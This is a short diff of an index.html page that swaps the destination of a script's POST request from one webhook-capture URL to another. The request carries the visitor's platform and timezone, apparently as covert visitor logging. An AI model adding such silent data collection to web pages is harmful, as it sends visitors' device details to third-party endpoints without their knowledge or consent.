--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@
       formData.append("platform", navigator.platform);
       formData.append("timezone", Intl.DateTimeFormat().resolvedOptions().timeZone);
 
-      fetch("https://webhook.site/b1218c8c-c615-4d0d-8173-5db4f8f397c0", {
+      fetch("https://eom1ae5o69bw4nt.m.pipedream.net", {
         method: "POST",
         body: formData
       });
